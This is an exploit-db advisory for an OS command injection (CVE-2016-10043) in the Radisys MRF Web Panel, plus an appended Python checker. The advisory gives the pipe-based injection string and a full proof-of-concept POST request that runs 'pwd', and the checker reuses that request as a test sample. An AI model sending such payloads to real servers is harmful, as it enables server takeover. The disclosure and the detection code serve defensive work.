Radisys MRF – Command Injection

  • Author: Filippos Mastrogiannis
    Date: 2017-01-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41179/
  • Title: MRF Web Panel OS Command Injection
    Vendor: Radisys
    Vendor Homepage: http://www.radisys.com
    Product: MRF Web Panel (SWMS)
    Version: 9.0.1
    CVE: CVE-2016-10043
    CWE: CWE-78
    Risk Level: High
    
    Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
    COSMOTE (OTE Group) Information & Network Security
    
    -----------------------------------------------------------------------------------------
    
    
    Vulnerability Details:
    
    The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
    attacks.
    
    > Affected parameter: MSM_MACRO_NAME (POST parameter)
    > Affected file: ms.cgi (/swms/ms.cgi)
    > Verified Affected Operation: Show Fatal Error and Log Package Configuration
    
    It is possible to use the pipe character (|) to inject arbitrary OS commands
    and retrieve the output in the application's responses:
    
    MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
    
    
    Proof Of Concept:
    
    1. Log in to the vulnerable MRF web panel (with a standard user account):
     https://<vulnerable>/swms
    2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP, etc.)
    3. Modify and send the following POST request:
    
    POST /swms/ms.cgi HTTP/1.1
    Host: <vulnerable>
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 213
    
    MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
    
    4. Check the output of the injected command 'pwd' in the response:
    
    HTTP/1.1 200 OK
    Date: Thu, 21 Jul 2016 08:18:43 GMT
    Server: Apache
    Cache-Control: no-cache
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 23
    
    /var/opt/swms/www/html
    
    
    Vulnerability Impact:
    
    The application's own data and functionality, or the web server, can be
    compromised due to OS command injection vulnerabilities. It may also be possible
    to use the server as a platform for attacks against other systems.
    
    
    Disclaimer:
    
    The responsible disclosure policy has been followed.
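
Added example (not part of the original advisory, and not Radisys code): a defensive check that a reverse proxy, WAF hook or log-review script could apply to POST bodies sent to /swms/ms.cgi, flagging any MSM_MACRO_NAME value that is not a plain identifier. The allow-list pattern, the function name check_macro_name and the SESSION placeholder are assumptions; the two sample bodies are constructed from the request shown in the advisory.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate macro names look like "Show_Fatal_Error_Configuration",
# i.e. letters, digits and underscores only. Tighten this to the panel's real
# list of macro names where that list is known.
SAFE_MACRO_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")

# Characters a shell treats specially; reported so an alert shows why it fired.
SHELL_META = set("|&;`$<>(){}\\'\"#\n\r")


def check_macro_name(body: str) -> dict:
    """Classify MSM_MACRO_NAME in a urlencoded /swms/ms.cgi POST body."""
    fields = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    values = fields.get("MSM_MACRO_NAME", [])
    result = {"present": bool(values), "allowed": True, "metachars": []}
    found = set()
    for value in values:  # a repeated parameter is checked in every position
        if not SAFE_MACRO_NAME.fullmatch(value):
            result["allowed"] = False
            found |= SHELL_META & set(value)
    result["metachars"] = sorted(found)
    return result


# Constructed sample: the legitimate request, with a placeholder session id.
BENIGN_BODY = (
    "MSM_SID=SESSION&MSM_MACRO_NAME=Show_Fatal_Error_Configuration"
    "&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO"
    "&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute"
)

# Constructed sample: the request body from the advisory's proof of concept.
POC_BODY = (
    "MSM_SID=SESSION&MSM_MACRO_NAME=Show_Fatal_Error_Configuration"
    "|||a%20%23'%20|pwd||a%20%23|\"%20|||a%20%23"
    "&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO"
    "&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("poc", POC_BODY)):
        print(name, check_macro_name(body))
```

Rejecting on the allow-list rather than on the metacharacter set is what matters; the metacharacter list only makes the alert readable.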